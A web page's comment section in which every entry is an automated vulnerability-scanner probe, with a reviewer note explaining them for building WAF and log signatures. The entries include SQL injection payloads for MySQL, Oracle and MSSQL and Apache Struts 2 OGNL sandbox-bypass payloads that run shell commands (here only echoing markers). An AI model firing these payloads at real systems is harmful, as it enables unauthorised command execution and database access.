358 Comments

Reviewer note: the entries below are not discussion; they are automated scanner probes that the comment form accepted and stored. Three families are visible: sqlmap-style SQL injection checks (MySQL `UNION ALL SELECT ... CONCAT(0x<marker>,(SELECT (CASE WHEN (n=n) THEN 1 ELSE 0 END)),0x<marker>)` with varying NULL counts to find the column count and a reflected position, plus one Oracle `XMLType(CHR(60)||...)` and one MSSQL `CONVERT(INT,...)` error-based probe — every condition is a tautology, so success is detected by the marker string showing up in the page or in a database error), Apache Struts 2 / XWork OGNL injection probes using the `#_memberAccess` / `DEFAULT_MEMBER_ACCESS` sandbox-bypass template that only run `echo <marker>` through `cmd.exe /c` or `/bin/bash -c` and return the output, and a `${new java.lang.String(new byte[]{...})}` expression-language probe that builds a lowercase marker string. Their presence shows the site was probed, not that any injection succeeded. The CMS's typographic filter may rewrite the ASCII `'` and `--` of the original requests as curly quotes and en dashes in the rendered text; build WAF or log signatures from the ASCII forms.

  1. ${new java.lang.String(new byte[]{105, 116, 108, 116, 119, 115, 113, 118, 106, 114, 122, 111, 118, 101, 104, 117, 109, 106, 112, 102, 97, 107, 98, 107, 97, 103, 100, 103, 115, 119, 122, 99, 117, 99, 120, 104, 112, 111, 113, 109, 120, 98, 114, 100, 105, 121, 102, 110, 121, 101, 113, 98, 102, 107, 111, 116, 120, 97, 114, 104, 119, 106, 112, 112, 97, 110, 117, 115, 120, 101, 106, 108, 118, 116, 114, 99, 105, 110, 111, 107, 121, 98, 103, 100, 108, 109, 102, 118, 122, 99, 109, 101, 122, 104, 105, 121, 103, 113, 117, 119})}

  2. atestu' LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x384b614865795551,(SELECT (CASE WHEN (5949=5949) THEN 1 ELSE 0 END)),0x384b614865795551),NULL,NULL-- end

  3. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x634454485657494d,(SELECT (CASE WHEN (5579=5579) THEN 1 ELSE 0 END)),0x634454485657494d)-- end

  4. atestu' LIMIT 0,1 UNION ALL SELECT CONCAT(0x7451327954394742,(SELECT (CASE WHEN (5928=5928) THEN 1 ELSE 0 END)),0x7451327954394742),NULL-- end

  5. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo gsaqknojmeuulkzpwtqvribevrjtfx').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  6. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo jmzauocszhgfedqodeyphnluwknyrr').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  7. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo yicdlbwaoyumgkjsjlzeghxcnbwoet').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  8. atestu' LIMIT 0,1 UNION ALL SELECT CONCAT(0x7264324c6f655a75,(SELECT (CASE WHEN (5783=5783) THEN 1 ELSE 0 END)),0x7264324c6f655a75),NULL,NULL,NULL,NULL-- end

  9. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x594b38456a754a37,(SELECT (CASE WHEN (5180=5180) THEN 1 ELSE 0 END)),0x594b38456a754a37)-- end

  10. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo jrmelpngsqukcxnfizkoygabpryhsv').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  11. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo mzlvaiqpgyrexnwhwcnxdfsrjfqsmv').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  12. atestu' AND 4896=(SELECT UPPER(XMLType(CHR(60)||'p1Qwvk6l'||(SELECT (CASE WHEN (4896=4896) THEN 1 ELSE 0 END) FROM DUAL)||'p1Qwvk6l'||CHR(62))) FROM DUAL) AND 'p1Qwvk6l'='p1Qwvk6l

  13. atestu' AND 4606=CONVERT(INT,('HzOLDQ3a'+(SELECT (CASE WHEN (4606=4606) THEN '1' ELSE '0' END))+'HzOLDQ3a')) AND 'HzOLDQ3a'='HzOLDQ3a

  14. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x416a76426b686374,(SELECT (CASE WHEN (5414=5414) THEN 1 ELSE 0 END)),0x416a76426b686374),NULL,NULL-- end
